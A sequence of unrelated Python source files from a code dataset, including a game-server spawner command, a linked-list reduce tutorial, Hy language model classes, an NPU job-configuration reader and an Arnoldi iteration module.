caller.msg(f"{n_updated} objects were updated.")
return
def _parse_key_desc_tags(self, argstring, desc=True):
"""
Parse ;-separated input list.
"""
key, desc, tags = "", "", []
if ";" in argstring:
parts = [part.strip().lower() for part in argstring.split(";")]
if len(parts) > 1 and desc:
key = parts[0]
desc = parts[1]
tags = parts[2:]
else:
key = parts[0]
tags = parts[1:]
else:
key = argstring.strip().lower()
return key, desc, tags
def func(self):
"""Implements the spawner"""
caller = self.caller
noloc = "noloc" in self.switches
# run the menu/olc
if (
self.cmdstring == "olc"
or "menu" in self.switches
or "olc" in self.switches
or "edit" in self.switches
):
# OLC menu mode
prototype = None
if self.lhs:
prototype_key = self.lhs
prototype = self._search_prototype(prototype_key)
if not prototype:
return
olc_menus.start_olc(caller, session=self.session, prototype=prototype)
return
if "search" in self.switches:
# query for a key match. The arg is a search query or nothing.
if not self.args:
# an empty search returns the full list
self._list_prototypes()
return
# search for key;tag combinations
key, _, tags = self._parse_key_desc_tags(self.args, desc=False)
self._list_prototypes(key, tags)
return
if "raw" in self.switches:
# query for key match and return the prototype as a safe one-liner string.
if not self.args:
caller.msg("You need to specify a prototype-key to get the raw data for.")
prototype = self._search_prototype(self.args)
if not prototype:
return
caller.msg(str(prototype))
return
if "show" in self.switches or "examine" in self.switches:
# show a specific prot detail. The argument is a search query or empty.
if not self.args:
# we don't show the list of all details, that's too spammy.
caller.msg("You need to specify a prototype-key to show.")
return
detail_string = self._get_prototype_detail(self.args)
if not detail_string:
return
caller.msg(detail_string)
return
if "list" in self.switches:
# for list, all optional arguments are tags.
tags = self.lhslist
err = self._list_prototypes(tags=tags)
if err:
caller.msg(
"No prototypes found with prototype-tag(s): {}".format(
list_to_string(tags, "or")
)
)
return
if "save" in self.switches:
# store a prototype to the database store
if not self.args:
caller.msg(
"Usage: spawn/save [<key>[;desc[;tag,tag[,...][;lockstring]]]] = <prototype_dict>"
)
return
if self.rhs:
# input on the form key = prototype
prototype_key, prototype_desc, prototype_tags = self._parse_key_desc_tags(self.lhs)
prototype_key = None if not prototype_key else prototype_key
prototype_desc = None if not prototype_desc else prototype_desc
prototype_tags = None if not prototype_tags else prototype_tags
prototype_input = self.rhs.strip()
else:
prototype_key = prototype_desc = None
prototype_tags = None
prototype_input = self.lhs.strip()
# handle parsing
prototype = self._parse_prototype(prototype_input)
if not prototype:
return
prot_prototype_key = prototype.get("prototype_key")
if not (prototype_key or prot_prototype_key):
caller.msg(
"A prototype_key must be given, either as `prototype_key = <prototype>` "
"or as a key 'prototype_key' inside the prototype structure."
)
return
if prototype_key is None:
prototype_key = prot_prototype_key
if prot_prototype_key != prototype_key:
caller.msg("(Replacing `prototype_key` in prototype with given key.)")
prototype["prototype_key"] = prototype_key
if prototype_desc is not None and prot_prototype_key != prototype_desc:
caller.msg("(Replacing `prototype_desc` in prototype with given desc.)")
prototype["prototype_desc"] = prototype_desc
if prototype_tags is not None and prototype.get("prototype_tags") != prototype_tags:
caller.msg("(Replacing `prototype_tags` in prototype with given tag(s))")
prototype["prototype_tags"] = prototype_tags
string = ""
# check for existing prototype (exact match)
old_prototype = self._search_prototype(prototype_key, quiet=True)
diff = spawner.prototype_diff(old_prototype, prototype, homogenize=True)
diffstr = spawner.format_diff(diff)
new_prototype_detail = self._get_prototype_detail(prototypes=[prototype])
if old_prototype:
if not diffstr:
string = f"|yAlready existing Prototype:|n\n{new_prototype_detail}\n"
question = (
"\nThere seems to be no changes. Do you still want to (re)save? [Y]/N"
)
else:
string = (
f'|yExisting prototype "{prototype_key}" found. Change:|n\n{diffstr}\n'
f"|yNew changed prototype:|n\n{new_prototype_detail}"
)
question = (
"\n|yDo you want to apply the change to the existing prototype?|n [Y]/N"
)
else:
string = f"|yCreating new prototype:|n\n{new_prototype_detail}"
question = "\nDo you want to continue saving? [Y]/N"
answer = yield (string + question)
if answer.lower() in ["n", "no"]:
caller.msg("|rSave cancelled.|n")
return
# all seems ok. Try to save.
try:
prot = protlib.save_prototype(prototype)
if not prot:
caller.msg("|rError saving:|R {}.|n".format(prototype_key))
return
except protlib.PermissionError as err:
caller.msg("|rError saving:|R {}|n".format(err))
return
caller.msg("|gSaved prototype:|n {}".format(prototype_key))
# check if we want to update existing objects
self._update_existing_objects(self.caller, prototype_key, quiet=True)
return
if not self.args:
# all switches beyond this point gets a common non-arg return
ncount = len(protlib.search_prototype())
caller.msg(
"Usage: spawn <prototype-key> or {{key: value, ...}}"
f"\n ({ncount} existing prototypes. Use /list to inspect)"
)
return
if "delete" in self.switches:
# remove db-based prototype
prototype_detail = self._get_prototype_detail(self.args)
if not prototype_detail:
return
string = f"|rDeleting prototype:|n\n{prototype_detail}"
question = "\nDo you want to continue deleting? [Y]/N"
answer = yield (string + question)
if answer.lower() in ["n", "no"]:
caller.msg("|rDeletion cancelled.|n")
return
try:
success = protlib.delete_prototype(self.args)
except protlib.PermissionError as err:
retmsg = f"|rError deleting:|R {err}|n"
else:
retmsg = (
"Deletion successful"
if success
else "Deletion failed (does the prototype exist?)"
)
caller.msg(retmsg)
return
if "update" in self.switches:
# update existing prototypes
prototype_key = self.args.strip().lower()
self._update_existing_objects(self.caller, prototype_key)
return
# If we get to this point, we use not switches but are trying a
# direct creation of an object from a given prototype or -key
prototype = self._parse_prototype(
self.args, expect=dict if self.args.strip().startswith("{") else str
)
if not prototype:
# this will only let through dicts or strings
return
key = "<unnamed>"
if isinstance(prototype, str):
# A prototype key we are looking to apply
prototype_key = prototype
prototype = self._search_prototype(prototype_key)
if not prototype:
return
# proceed to spawning
try:
for obj in spawner.spawn(prototype, caller=self.caller):
self.caller.msg("Spawned %s." % obj.get_display_name(self.caller))
if not prototype.get("location") and not noloc:
# we don't hardcode the location in the prototype (unless the user
# did so manually) - that would lead to it having to be 'removed' every
# time we try to update objects with this prototype in the future.
obj.location = caller.location
except RuntimeError as err:
caller.msg(err)
|
the-stack_0_1589 | class _Creep:
body = []
memory = {'class' : 'AbstractBaseCreep'} # Override this in subclasses
name = None
def __init__(self, spawner):
self.spawner = spawner
def spawn(self):
resp = self.spawner.canCreateCreep(self.body, self.name)
if resp == OK:
print("Spawning new " + self.type)
print("Body: " + self.body)
print("Memory: " + self.memory)
self.spawner.createCreep(self.body, self.name, self.memory)
else:
print("Tried to spawn a " + self.type + " but got code " + resp)
class BasicHarvester(_Creep):
body = [WORK, MOVE, CARRY]
memory = {'class': 'BasicHarvester'}
|
the-stack_0_1590 | # https://gist.github.com/seanchen1991/a151368df32b8e7ae6e7fde715e44b78
# reduce takes a data structure and either finds a key piece of data or
# be able to restructure the data structure
# 1. Reduce usually takes a linear data structure (99% we use reduce on an array)
# 2. Reduce "aggregates" all of the data in the data structure into one final value
# 3. Reduce is extremely flexible with how the reduction actually happens
# 3a. Reduce doesn't care how the reduction happens
# 4. The "reducer" function that's passed in as input is how we specify how the reduction happens
# what's the deal with the anonymous function's parameters?
# 1. An aggregator value
# 2. The current list node
# 3. An optional value the aggregator is initialized with
# what happens on a single call of the anonymous function?
# how many times does the reducer function get called? Once for every element in our data structure
# does the anonymous function do the work of iterating over our data structure?
# no, the anonymous function itself doesn't do the work of iterating
# Steps for our reduce function
# How do all of these calls get aggregated into a single value?
# The anonymous function needs to update the aggregated value somehow
# where is the state set and how is it defaulted to the head?
def linked_list_reduce(head, reducer, init=None):
# where/when do we initialize the state?
# initialize state before we start looping
state = None
# what do we do when the init value is set?
if init != None:
state = init
# what do we do when the init value is None?
elif state is None:
# set the state to be the first value in our list
state = head.value
# move the head to the next list node
head = head.next
# 1. Loop over the data structure
current = head
while current:
# 2. Call our anonymous function on the current iteration value
# 3. Update our state to be the result of the anonymous function
state = reducer(state, current.value)
# update our current pointer
current = current.next
# 4. Return the final aggregated state
return state
class Node:
def __init__(self, value, next=None):
self.value = value
self.next = next
l1 = Node(4)
l2 = Node(7)
l3 = Node(15)
l4 = Node(29)
l5 = Node(5)
l1.next = l2
l2.next = l3
l3.next = l4
l4.next = l5
def reducer(x, y): return x - y
print(linked_list_reduce(l1, reducer, 100))
|
the-stack_0_1591 | """Plot a Lyapunov contour"""
from typing import cast, List, Tuple, Optional, TYPE_CHECKING
import matplotlib.pyplot as plt
from matplotlib.pyplot import figure
import pandas as pd
import seaborn as sns
import torch
import tqdm
from neural_clbf.experiments import Experiment
from neural_clbf.systems import ObservableSystem # noqa
if TYPE_CHECKING:
from neural_clbf.controllers import Controller, NeuralObsBFController # noqa
class LFContourExperiment(Experiment):
"""An experiment for plotting the contours of learned LFs"""
def __init__(
self,
name: str,
domain: Optional[List[Tuple[float, float]]] = None,
n_grid: int = 50,
x_axis_index: int = 0,
y_axis_index: int = 1,
x_axis_label: str = "$x$",
y_axis_label: str = "$y$",
default_state: Optional[torch.Tensor] = None,
):
"""Initialize an experiment for plotting the value of the LF over selected
state dimensions.
args:
name: the name of this experiment
domain: a list of two tuples specifying the plotting range,
one for each state dimension.
n_grid: the number of points in each direction at which to compute h
x_axis_index: the index of the state variable to plot on the x axis
y_axis_index: the index of the state variable to plot on the y axis
x_axis_label: the label for the x axis
y_axis_label: the label for the y axis
default_state: 1 x dynamics_model.n_dims tensor of default state
values. The values at x_axis_index and y_axis_index will be
overwritten by the grid values.
"""
super(LFContourExperiment, self).__init__(name)
# Default to plotting over [-1, 1] in all directions
if domain is None:
domain = [(-1.0, 1.0), (-1.0, 1.0)]
self.domain = domain
self.n_grid = n_grid
self.x_axis_index = x_axis_index
self.y_axis_index = y_axis_index
self.x_axis_label = x_axis_label
self.y_axis_label = y_axis_label
self.default_state = default_state
@torch.no_grad()
def run(self, controller_under_test: "Controller") -> pd.DataFrame:
"""
Run the experiment, likely by evaluating the controller, but the experiment
has freedom to call other functions of the controller as necessary (if these
functions are not supported by all controllers, then experiments will be
responsible for checking compatibility with the provided controller)
args:
controller_under_test: the controller with which to run the experiment
returns:
a pandas DataFrame containing the results of the experiment, in tidy data
format (i.e. each row should correspond to a single observation from the
experiment).
"""
# Sanity check: can only be called on a NeuralObsBFController
if not (hasattr(controller_under_test, "h")):
raise ValueError("Controller under test must be a NeuralObsBFController")
controller_under_test = cast("NeuralObsBFController", controller_under_test)
# Set up a dataframe to store the results
results_df = pd.DataFrame()
# Set up the plotting grid
device = "cpu"
if hasattr(controller_under_test, "device"):
device = controller_under_test.device # type: ignore
x_vals = torch.linspace(
self.domain[0][0], self.domain[0][1], self.n_grid, device=device
)
y_vals = torch.linspace(
self.domain[1][0], self.domain[1][1], self.n_grid, device=device
)
# Default to all zeros if no default provided
if self.default_state is None:
default_state = torch.zeros(1, controller_under_test.dynamics_model.n_dims)
else:
default_state = self.default_state
default_state = default_state.type_as(x_vals)
# Make a copy of the default state, which we'll modify on every loop
x = (
default_state.clone()
.detach()
.reshape(1, controller_under_test.dynamics_model.n_dims)
)
# Loop through the grid
prog_bar_range = tqdm.trange(self.n_grid, desc="Plotting LF", leave=True)
for i in prog_bar_range:
for j in range(self.n_grid):
# Adjust x to be at the current grid point
x[0, self.x_axis_index] = x_vals[i]
x[0, self.y_axis_index] = y_vals[j]
# Get the value of the LF at this point
V = controller_under_test.V(x)
# TODO @dawsonc measure violation
# Store the results
results_df = results_df.append(
{
self.x_axis_label: x_vals[i].cpu().numpy().item(),
self.y_axis_label: y_vals[j].cpu().numpy().item(),
"V": V.cpu().numpy().item(),
},
ignore_index=True,
)
return results_df
def plot(
self,
controller_under_test: "Controller",
results_df: pd.DataFrame,
display_plots: bool = False,
) -> List[Tuple[str, figure]]:
"""
Plot the results, and return the plot handles. Optionally
display the plots.
args:
controller_under_test: the controller with which to run the experiment
display_plots: defaults to False. If True, display the plots (blocks until
the user responds).
returns: a list of tuples containing the name of each figure and the figure
object.
"""
# Set the color scheme
sns.set_theme(context="talk", style="white")
# Plot a contour of h
fig, ax = plt.subplots(1, 1)
fig.set_size_inches(12, 8)
contours = ax.tricontourf(
results_df[self.x_axis_label],
results_df[self.y_axis_label],
results_df["V"],
cmap=sns.color_palette("rocket", as_cmap=True),
)
plt.colorbar(contours, ax=ax, orientation="vertical")
# Make the legend
ax.set_xlabel(self.x_axis_label)
ax.set_ylabel(self.y_axis_label)
fig_handle = ("V Contour", fig)
if display_plots:
plt.show()
return []
else:
return [fig_handle]
|
the-stack_0_1592 | # Copyright 2021 the authors.
# This file is part of Hy, which is free software licensed under the Expat
# license. See the LICENSE.
from __future__ import unicode_literals
from contextlib import contextmanager
from math import isnan, isinf
from hy import _initialize_env_var
from hy.errors import HyWrapperError
from fractions import Fraction
from colorama import Fore
PRETTY = True
COLORED = _initialize_env_var('HY_COLORED_AST_OBJECTS', False)
@contextmanager
def pretty(pretty=True):
"""
Context manager to temporarily enable
or disable pretty-printing of Hy model reprs.
"""
global PRETTY
old, PRETTY = PRETTY, pretty
try:
yield
finally:
PRETTY = old
class _ColoredModel:
"""
Mixin that provides a helper function for models that have color.
"""
def _colored(self, text):
if COLORED:
return self.color + text + Fore.RESET
else:
return text
class Object(object):
"""
Generic Hy Object model. This is helpful to inject things into all the
Hy lexing Objects at once.
The position properties (`start_line`, `end_line`, `start_column`,
`end_column`) are each 1-based and inclusive. For example, a symbol
`abc` starting at the first column would have `start_column` 1 and
`end_column` 3.
"""
properties = ["module", "_start_line", "end_line", "_start_column",
"end_column"]
def replace(self, other, recursive=False):
if isinstance(other, Object):
for attr in self.properties:
if not hasattr(self, attr) and hasattr(other, attr):
setattr(self, attr, getattr(other, attr))
else:
raise TypeError("Can't replace a non Hy object '{}' with a Hy object '{}'".format(repr(other), repr(self)))
return self
@property
def start_line(self):
return getattr(self, "_start_line", 1)
@start_line.setter
def start_line(self, value):
self._start_line = value
@property
def start_column(self):
return getattr(self, "_start_column", 1)
@start_column.setter
def start_column(self, value):
self._start_column = value
def __repr__(self):
return (f"hy.models.{self.__class__.__name__}"
f"({super(Object, self).__repr__()})")
_wrappers = {}
def wrap_value(x):
"""Wrap `x` into the corresponding Hy type.
This allows replace_hy_obj to convert a non Hy object to a Hy object.
This also allows a macro to return an unquoted expression transparently.
"""
new = _wrappers.get(type(x), lambda y: y)(x)
if not isinstance(new, Object):
raise HyWrapperError("Don't know how to wrap {!r}: {!r}".format(type(x), x))
if isinstance(x, Object):
new = new.replace(x, recursive=False)
return new
def replace_hy_obj(obj, other):
return wrap_value(obj).replace(other)
def repr_indent(obj):
return repr(obj).replace("\n", "\n ")
class String(Object, str):
"""
Generic Hy String object. Helpful to store string literals from Hy
scripts. It's either a ``str`` or a ``unicode``, depending on the
Python version.
"""
def __new__(cls, s=None, brackets=None):
value = super(String, cls).__new__(cls, s)
value.brackets = brackets
return value
_wrappers[str] = String
class Bytes(Object, bytes):
"""
Generic Hy Bytes object. It's either a ``bytes`` or a ``str``, depending
on the Python version.
"""
pass
_wrappers[bytes] = Bytes
class Symbol(Object, str):
"""
Hy Symbol. Basically a string.
"""
def __new__(cls, s=None):
return super(Symbol, cls).__new__(cls, s)
_wrappers[bool] = lambda x: Symbol("True") if x else Symbol("False")
_wrappers[type(None)] = lambda foo: Symbol("None")
class Keyword(Object):
"""Generic Hy Keyword object."""
__slots__ = ['name']
def __init__(self, value):
self.name = value
def __repr__(self):
return f"hy.models.{self.__class__.__name__}({self.name!r})"
def __str__(self):
return ":%s" % self.name
def __hash__(self):
return hash(self.name)
def __eq__(self, other):
if not isinstance(other, Keyword):
return NotImplemented
return self.name == other.name
def __ne__(self, other):
if not isinstance(other, Keyword):
return NotImplemented
return self.name != other.name
def __bool__(self):
return bool(self.name)
_sentinel = object()
def __call__(self, data, default=_sentinel):
from hy.lex import mangle
try:
return data[mangle(self.name)]
except KeyError:
if default is Keyword._sentinel:
raise
return default
# __getstate__ and __setstate__ are required for Pickle protocol
# 0, because we have __slots__.
def __getstate__(self):
return {k: getattr(self, k)
for k in self.properties + self.__slots__
if hasattr(self, k)}
def __setstate__(self, state):
for k, v in state.items():
setattr(self, k, v)
def strip_digit_separators(number):
# Don't strip a _ or , if it's the first character, as _42 and
# ,42 aren't valid numbers
return (number[0] + number[1:].replace("_", "").replace(",", "")
if isinstance(number, str) and len(number) > 1
else number)
class Integer(Object, int):
"""
Internal representation of a Hy Integer. May raise a ValueError as if
int(foo) was called, given Integer(foo).
"""
def __new__(cls, number, *args, **kwargs):
if isinstance(number, str):
number = strip_digit_separators(number)
bases = {"0x": 16, "0o": 8, "0b": 2}
for leader, base in bases.items():
if number.startswith(leader):
# We've got a string, known leader, set base.
number = int(number, base=base)
break
else:
# We've got a string, no known leader; base 10.
number = int(number, base=10)
else:
# We've got a non-string; convert straight.
number = int(number)
return super(Integer, cls).__new__(cls, number)
_wrappers[int] = Integer
def check_inf_nan_cap(arg, value):
if isinstance(arg, str):
if isinf(value) and "i" in arg.lower() and "Inf" not in arg:
raise ValueError('Inf must be capitalized as "Inf"')
if isnan(value) and "NaN" not in arg:
raise ValueError('NaN must be capitalized as "NaN"')
class Float(Object, float):
"""
Internal representation of a Hy Float. May raise a ValueError as if
float(foo) was called, given Float(foo).
"""
def __new__(cls, num, *args, **kwargs):
value = super(Float, cls).__new__(cls, strip_digit_separators(num))
check_inf_nan_cap(num, value)
return value
_wrappers[float] = Float
class Complex(Object, complex):
"""
Internal representation of a Hy Complex. May raise a ValueError as if
complex(foo) was called, given Complex(foo).
"""
def __new__(cls, real, imag=0, *args, **kwargs):
if isinstance(real, str):
value = super(Complex, cls).__new__(
cls, strip_digit_separators(real)
)
p1, _, p2 = real.lstrip("+-").replace("-", "+").partition("+")
check_inf_nan_cap(p1, value.imag if "j" in p1 else value.real)
if p2:
check_inf_nan_cap(p2, value.imag)
return value
return super(Complex, cls).__new__(cls, real, imag)
_wrappers[complex] = Complex
class Sequence(Object, tuple, _ColoredModel):
"""
An abstract type for sequence-like models to inherit from.
"""
def replace(self, other, recursive=True):
if recursive:
for x in self:
replace_hy_obj(x, other)
Object.replace(self, other)
return self
def __add__(self, other):
return self.__class__(super(Sequence, self).__add__(
tuple(other) if isinstance(other, list) else other))
def __getslice__(self, start, end):
return self.__class__(super(Sequence, self).__getslice__(start, end))
def __getitem__(self, item):
ret = super(Sequence, self).__getitem__(item)
if isinstance(item, slice):
return self.__class__(ret)
return ret
color = None
def __repr__(self):
return str(self) if PRETTY else super(Sequence, self).__repr__()
def __str__(self):
with pretty():
if self:
return self._colored("hy.models.{}{}\n {}{}".format(
self._colored(self.__class__.__name__),
self._colored("(["),
self._colored(",\n ").join(map(repr_indent, self)),
self._colored("])"),
))
else:
return self._colored(f"hy.models.{self.__class__.__name__}()")
class FComponent(Sequence):
"""
Analogue of ast.FormattedValue.
The first node in the contained sequence is the value being formatted,
the rest of the sequence contains the nodes in the format spec (if any).
"""
def __new__(cls, s=None, conversion=None):
value = super().__new__(cls, s)
value.conversion = conversion
return value
def replace(self, other, recursive=True):
super().replace(other, recursive)
if hasattr(other, "conversion"):
self.conversion = other.conversion
return self
class FString(Sequence):
"""
Generic Hy F-String object, for smarter f-string handling.
Mimics ast.JoinedStr, but using String and FComponent.
"""
def __new__(cls, s=None, brackets=None):
value = super().__new__(cls, s)
value.brackets = brackets
return value
class List(Sequence):
color = Fore.CYAN
def recwrap(f):
return lambda l: f(wrap_value(x) for x in l)
_wrappers[FComponent] = recwrap(FComponent)
_wrappers[FString] = recwrap(FString)
_wrappers[List] = recwrap(List)
_wrappers[list] = recwrap(List)
_wrappers[tuple] = recwrap(List)
class Dict(Sequence, _ColoredModel):
"""
Dict (just a representation of a dict)
"""
color = Fore.GREEN
def __str__(self):
with pretty():
if self:
pairs = []
for k, v in zip(self[::2],self[1::2]):
k, v = repr_indent(k), repr_indent(v)
pairs.append(
("{0}{c}\n {1}\n "
if '\n' in k+v
else "{0}{c} {1}").format(k, v, c=self._colored(',')))
if len(self) % 2 == 1:
pairs.append("{} {}\n".format(
repr_indent(self[-1]), self._colored("# odd")))
return "{}\n {}{}".format(
self._colored("hy.models.Dict(["),
"{c}\n ".format(c=self._colored(',')).join(pairs),
self._colored("])"))
else:
return self._colored("hy.models.Dict()")
def keys(self):
return list(self[0::2])
def values(self):
return list(self[1::2])
def items(self):
return list(zip(self.keys(), self.values()))
_wrappers[Dict] = recwrap(Dict)
_wrappers[dict] = lambda d: Dict(wrap_value(x) for x in sum(d.items(), ()))
class Expression(Sequence):
"""
Hy S-Expression. Basically just a list.
"""
color = Fore.YELLOW
_wrappers[Expression] = recwrap(Expression)
_wrappers[Fraction] = lambda e: Expression(
[Symbol("fraction"), wrap_value(e.numerator), wrap_value(e.denominator)])
class Set(Sequence):
"""
Hy set (just a representation of a set)
"""
color = Fore.RED
_wrappers[Set] = recwrap(Set)
_wrappers[set] = recwrap(Set)
|
the-stack_0_1593 | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyPoster(PythonPackage):
"""Streaming HTTP uploads and multipart/form-data encoding."""
homepage = "https://pypi.org/project/poster/"
url = "https://atlee.ca/software/poster/dist/0.8.1/poster-0.8.1.tar.gz"
version('0.8.1', '2db12704538781fbaa7e63f1505d6fc8')
depends_on('py-setuptools', type='build')
# https://bitbucket.org/chrisatlee/poster/issues/24/not-working-with-python3
# https://bitbucket.org/chrisatlee/poster/issues/25/poster-connot-work-in-python35
# Patch created using 2to3
patch('python3.patch', when='^python@3:')
|
the-stack_0_1594 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) Huawei Technologies Co., Ltd. 2019. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Inter-process communication using HCOM."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import json
from tensorflow.python.platform import tf_logging as logging
from npu_bridge.estimator.npu import util as util_lib
class JobInfo:
"""Job information send by CSA."""
def __init__(self,
job_id=0,
job_config=None,
heartbeat_time=-1,
region_id=None,
ak=None,
sk=None,
endpoint_url=None,
device_info=None,
rank_table_file=None,
restart_flag=0,
local_app_dir=None,
local_data_dir=None,
local_checkpoint_dir=None,
local_log_dir=None,
local_result_dir=None,
local_boot_file=None,
rank_size=1
):
"""
Constructs a JobInfo.
Args:
job_id: the unique identifier.
heartbeat_time: the frequency that framework records the heartbeat.
job_config: the configuration of the training task. It's a json string.
region_id: the region id to access the OBS.
ak: the ak to access the OBS.
sk: the sk to access the OBS.
endpoint_url: the host name to access the OBS.
device_info: the device information of the training task. It's a json string.
rank_table_file: the communication routing information.
restart_flag: the abnormal re-issued ID (0: Normally issued; 1: Abnormally re-issued).
local_app_dir: the local path of the user script downloaded from OBS, for example: userfile/code/
local_data_dir: the local path of the user data downloaded from OBS, for example: userfile/data/
local_checkpoint_dir: the local path of the checkpoint file downloaded from OBS, for example: checkpoint/
local_log_dir: the user-created log path, for example: userfile/log/
local_result_dir: the user-created output file path, for example: userfile/result/
local_boot_file: the local path of the user startup script, for example: userfile/code/boot.py
rank_size: Rank size.
"""
self._job_id = job_id
self._job_config = job_config
self._heartbeat_time = heartbeat_time
self._region_id = region_id
self._ak = ak
self._sk = sk
self._endpoint_url = endpoint_url
self._device_info = device_info
self._rank_table_file = rank_table_file
self._restart_flag = restart_flag
self._local_app_dir = local_app_dir
self._local_data_dir = local_data_dir
self._local_checkpoint_dir = local_checkpoint_dir
self._local_log_dir = local_log_dir
self._local_result_dir = local_result_dir
self._local_boot_file = local_boot_file
self._rank_size = rank_size
class JobConfig():
"""Job configuration."""
def __init__(self, learning_rate=None, batch_size=None):
"""
Constructs a JobConfig.
Args:
learning_rate: A Tensor or a floating point value. The learning rate to use.
batch_size: Integer, size of batches to return.
"""
self._learning_rate = learning_rate
self._batch_size = batch_size
class DeviceInfo():
"""Device information."""
def __init__(self,
index="0",
server_id="123456",
dev_index=1):
"""
Constructs a DeviceInfo.
Args:
index: the unique identifier.
server_id: the server resource unique identifier, obtained from resource management.
dev_index: the device serial number in AI server.
"""
self._index = index
self._server_id = server_id
self._dev_index = dev_index
self._root_rank = 0
def is_master_node(self):
"""Determines whether the current node is the primary node."""
return self._index == self._root_rank
class NPUBasics(object):
"""Wrapper class for the basic NPU API."""
__instance = None
__has_init = False
def __new__(cls, file_name):
if not cls.__instance:
cls.__instance = object.__new__(cls)
return cls.__instance
def __init__(self, file_name):
if not self.__has_init:
self._job_info = self._read_job_info(file_name)
self.__has_init = True
@property
def jobinfo(self):
"""Return property"""
return self._job_info
def size(self):
"""A function that returns the number of Tensorflow processes.
Returns:
An integer scalar containing the number of Tensorflow processes.
"""
return self._job_info._rank_size
def _read_job_info(self, file_name):
"""Read the job information.
Args:
file_name: it's a json file which contains the job info from CSA.
Returns:
The job information.
"""
try:
with open(file_name, 'r', encoding='UTF-8') as f:
content = f.read()
data = json.loads(content, encoding='UTF-8')
# 1. Get the device_info and check it.
device_info = data.get('device_info')
util_lib.check_not_none(device_info, 'device_info')
index = device_info.get('Index', None)
util_lib.check_nonnegative_integer(index, 'Index')
# 2. Get the rank_table_file and check it.
rank_table_file = data.get('rank_table_file', None)
util_lib.check_not_none(rank_table_file, 'rank_table_file')
# 3. Get the rank_size and check it.
rank_size = data.get('rank_size', None)
util_lib.check_positive_integer(rank_size, 'rank_size')
# 4. Get the local_checkpoint_dir and check it.
local_checkpoint_dir = data.get('local_checkpoint_dir', None)
# 5. Init the JobInfo.
device_info = DeviceInfo(index=str(index))
job_info = JobInfo(device_info=device_info, rank_table_file=rank_table_file,
local_checkpoint_dir=local_checkpoint_dir, rank_size=rank_size)
return job_info
except IOError:
logging.warning('Warning:job config file does not exist')
job_id = os.getenv('JOB_ID', "")
if job_id == "":
logging.error('Error:can not get job config from env')
return None
heartbeat = os.getenv('HEARTBEAT', "")
rank_table_file = os.getenv('RANK_TABLE_FILE', "")
identity = os.getenv('POD_NAME', "")
if identity == "":
identity = os.getenv('RANK_ID', "")
checkpoint_dir = os.getenv('LOCAL_CHECKPOINT_DIR', "")
# cann't get rank_size from env, set to default 1
rank_size = os.getenv('RANK_SIZE', '1')
if rank_size.isdigit() is False:
print("set rank_size to default 1")
rank_size = 1
device_info = DeviceInfo(index=str(identity))
job_info = JobInfo(job_id=job_id,
heartbeat_time=heartbeat,
device_info=device_info,
rank_table_file=rank_table_file,
local_checkpoint_dir=checkpoint_dir,
rank_size=int(rank_size)
)
return job_info
|
the-stack_0_1596 | # -*- coding: utf-8 -*-
# question 3
def count_letters(word,find):
"""
Example function with types documented in the docstring.
Ce code doit retourner le nombre d'occurences d'un caractère passé en paramètre dans un mot donné également
Parameters
----------
param1 : str
Le 1er paramètre est une chaine de caractères
param2 : char
Le 2ème paramètre est un caractère
Returns
-------
int
Nombre d'occurences du caractère
Exemples
--------
>>> count_letters(abracadabra,a)
5
>>> count_letters(momomotus,u)
1
"""
count=0
for i in range(len(word)):
if word.find(find,i)!=0:
count+=1
return count
#exemple
print(count_letters('abracadabra','a'))
# question 5
import string
def remove_punctuation(phrase):
"""
Example function with types documented in the docstring.
Ce code doit renvoyer une chaine de caractère issue d'un extrait dont la ponctuation a été supprimée
Parameters
----------
param1 : str
Le 1er paramètre est une chaine de caractères
Returns
-------
str
Chaine de caractères passée en paramètre sans la ponctuation
"""
phrase_sans_punct = ""
for letter in phrase:
if letter not in string.punctuation:
phrase_sans_punct += letter
return phrase_sans_punct
#exemple
print(remove_punctuation("Chaine de caractères, passée en paramètre, sans la ponctuation !!!"))
# question 7
def reverse(word) :
"""
Example function with types documented in the docstring.
Ce code doit renverser le mot qui lui est donné en paramètre
Parameters
----------
param1 : str
Le 1er paramètre est une chaine de caractères (un mot)
Returns
-------
str
Chaine de caractères qui est le mot de départ renversé
"""
new_word=""
for i in range(len(word)) :
new_word=new_word+word[-(i+1)]
return new_word
# question 8
def mirror(word) :
"""
Example function with types documented in the docstring.
Ce code doit afficher le mot qui lui est donné en paramètre en miroir
Parameters
----------
param1 : str
Le 1er paramètre est une chaine de caractères (un mot)
Returns
-------
str
Chaine de caractères qui est le mot de départ écrit comme s'il était lu dans un miroir
"""
new_word=word+reverse(word)
return new_word
|
the-stack_0_1597 | """Arnoldi algorithm.
Computes V and H such that :math:`AV_n = V_{n+1}\\underline{H}_n`. If the Krylov
subspace becomes A-invariant then V and H are truncated such that :math:`AV_n = V_n
H_n`.
:param A: a linear operator that works with the @-operator
:param v: the initial vector.
:param ortho: (optional) orthogonalization algorithm: may be one of
* ``'mgs'``: modified Gram-Schmidt (default).
* ``'dmgs'``: double Modified Gram-Schmidt.
* ``'lanczos'``: Lanczos short recurrence.
* ``'householder'``: Householder.
:param M: (optional) a self-adjoint and positive-definite preconditioner. If
``M`` is provided, then also a second basis :math:`P_n` is constructed such that
:math:`V_n=MP_n`. This is of importance in preconditioned methods. ``M`` has to
be ``None`` if ``ortho=='householder'`` (see ``B``).
:param inner: (optional) defines the inner product to use. See
:py:meth:`inner`.
``inner`` has to be ``None`` if ``ortho=='householder'``. It's unclear how a
variant of the Householder QR algorithm can be used with a non-Euclidean inner
product. Compare <https://math.stackexchange.com/q/433644/36678>.
"""
import numpy as np
from ._helpers import Identity, aslinearoperator, get_default_inner
from .errors import ArgumentError
from .householder import Householder
class ArnoldiHouseholder:
def __init__(self, A, v):
self.inner = get_default_inner(v.shape)
# save parameters
self.A = A
self.v = v
self.dtype = np.find_common_type([A.dtype, v.dtype], [])
# number of iterations
self.iter = 0
# Arnoldi basis
self.V = []
# flag indicating if Krylov subspace is invariant
self.is_invariant = False
